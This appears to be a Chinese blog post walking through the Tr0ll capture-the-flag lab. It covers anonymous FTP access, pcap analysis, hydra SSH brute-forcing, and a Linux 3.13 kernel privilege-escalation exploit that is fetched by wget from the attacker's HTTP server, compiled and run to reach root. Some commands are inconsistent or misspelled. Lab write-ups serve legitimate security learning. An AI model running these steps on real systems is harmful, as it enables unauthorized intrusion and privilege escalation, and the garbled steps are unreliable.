标签:文件 37293 查看 192.168 ls Tr0II txt
扫描IP,查找服务
有80 21 22端口开放,网站进去看下
drib扫描,没有作用
上面FTP可以匿名登录,账号是Anonymous(匿名的意思) 密码直接enter确定
ls
有流量分析文件
get lol.pcap 下载下来
打开,加规则,查看tcp流量
进入此后缀,点击文件
拉到kali
file roflmao
strings(识别动态库版本指令)roflmao 查看文件底层内容
进入此地址,使用
wegt下载或者自编文件写入
hydra -L 1.txt -p Pass.txt 192.168.218.136 ssh
overflow
Pass.txt
uname -a
查看内核版本
查看相关漏洞
searchsploit Linux 3.13.0
复制到文件夹
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/run/37293.c
python -m http.server 8080 启动下载端口
进入靶机ssh cd tmp/
wget http://192.168.218.129:8080/37293.c
gcc 37293.c -o 123
./huanghong 运行
id 查看下权限成功
cd /root
ls
cat proof.txt 成功
标签:文件,
37293,
查看,
192.168,
ls,
Tr0II,
txt
From: https://www.cnblogs.com/yang-ace/p/17971053